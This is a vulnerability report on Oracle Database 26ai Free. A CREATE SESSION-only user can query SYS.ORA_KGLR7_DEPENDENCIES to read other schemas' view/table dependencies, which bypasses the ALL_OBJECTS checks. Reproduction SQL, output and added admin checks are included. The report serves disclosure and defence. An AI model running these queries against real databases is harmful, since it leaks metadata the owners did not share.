Summary
A low-privileged user (CREATE SESSION only) can query the internal view SYS.ORA_KGLR7_DEPENDENCIES and read metadata (parent table name and view name) of views owned by other users. This bypasses the privilege checks that the supported data dictionary views (ALL_OBJECTS, ALL_DEPENDENCIES) apply, and discloses object relationships across schemas.
Environment
Docker image: container-registry.oracle.com/database/free:latest
Version: Oracle AI Database 26ai Free Release 23.26.0.0.0
Reproduction
-- 1. Start the Oracle Database
-- (e.g. docker run -d --name oracle-free -p 1521:1521 -e ORACLE_PWD=123456 container-registry.oracle.com/database/free:latest)
-- 2. Connect as SYSTEM: create private objects
-- (e.g. docker exec -it oracle-free sqlplus SYSTEM/123456@//127.0.0.1:1521/FREEPDB1)
CREATE USER GUEST IDENTIFIED BY 123456;
GRANT CREATE SESSION TO GUEST;
CREATE TABLE private_t1 (x INT);
CREATE VIEW private_v1 AS SELECT * FROM private_t1;
-- 3. Connect as low-priv user
-- (e.g. docker exec -it oracle-free sqlplus GUEST/123456@//127.0.0.1:1521/FREEPDB1)
SELECT * FROM session_privs;
SELECT * FROM ALL_OBJECTS WHERE OBJECT_NAME = 'PRIVATE_V1';
SELECT PARENT_NAME, NAME FROM SYS.ORA_KGLR7_DEPENDENCIES WHERE OWNER = 'SYSTEM' AND NAME = 'PRIVATE_V1';
Observed result
The output for the low-privileged user is:
SQL> SELECT * FROM session_privs;
PRIVILEGE
----------------------------------------
CREATE SESSION
SQL> SELECT * FROM ALL_OBJECTS WHERE OBJECT_NAME = 'PRIVATE_V1';
no rows selected
SQL> SELECT PARENT_NAME, NAME FROM SYS.ORA_KGLR7_DEPENDENCIES WHERE OWNER = 'SYSTEM' AND NAME = 'PRIVATE_V1';
PARENT_NAME NAME
--------------- ---------------
PRIVATE_T1 PRIVATE_V1
Expected result
A user without dictionary access should not see dependencies of objects they do not own, which is exactly how ALL_OBJECTS behaves above (no rows). The query against SYS.ORA_KGLR7_DEPENDENCIES WHERE OWNER … should likewise return no rows.
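The following queries are an added check for administrators, not part of the original report. They confirm which grantees can reach the internal view (DBA_TAB_PRIVS), and contrast the privilege-checked dictionary path (ALL_DEPENDENCIES) with the internal view for the same object. Object and user names follow the report (SYSTEM, GUEST, PRIVATE_V1); the dictionary column names used are the standard ones for DBA_TAB_PRIVS and ALL_DEPENDENCIES.

```sql
-- Added example (not part of the original report). Step 1 runs as a DBA in
-- FREEPDB1; steps 2 and 3 run as the low-privileged user GUEST.

-- 1. Which grantees hold privileges on the internal dependency view? A row with
--    GRANTEE = 'PUBLIC' is the path by which a CREATE SESSION-only user reaches
--    cross-schema metadata.
SELECT grantee, privilege, grantable
  FROM dba_tab_privs
 WHERE owner = 'SYS'
   AND table_name = 'ORA_KGLR7_DEPENDENCIES';

-- 2. Baseline: the supported, privilege-checked dependency view. Run as GUEST,
--    this returns no rows for SYSTEM's view, matching the ALL_OBJECTS result in
--    the report. This is the behaviour the internal view should also show.
SELECT referenced_owner, referenced_name, name
  FROM all_dependencies
 WHERE owner = 'SYSTEM'
   AND name  = 'PRIVATE_V1';

-- 3. Same filter against the internal view, run as GUEST. Any row returned here
--    reproduces the disclosure; compare with the empty result of step 2.
SELECT parent_name, name
  FROM sys.ora_kglr7_dependencies
 WHERE owner = 'SYSTEM'
   AND name  = 'PRIVATE_V1';
```

Step 1 tells you whether the exposure comes from a grant to PUBLIC or from something specific to the test user. Revoking grants on SYS-owned internal views can break dictionary views that depend on them, so treat the result of step 1 as input for a vendor support case rather than as a revoke to run on a production instance.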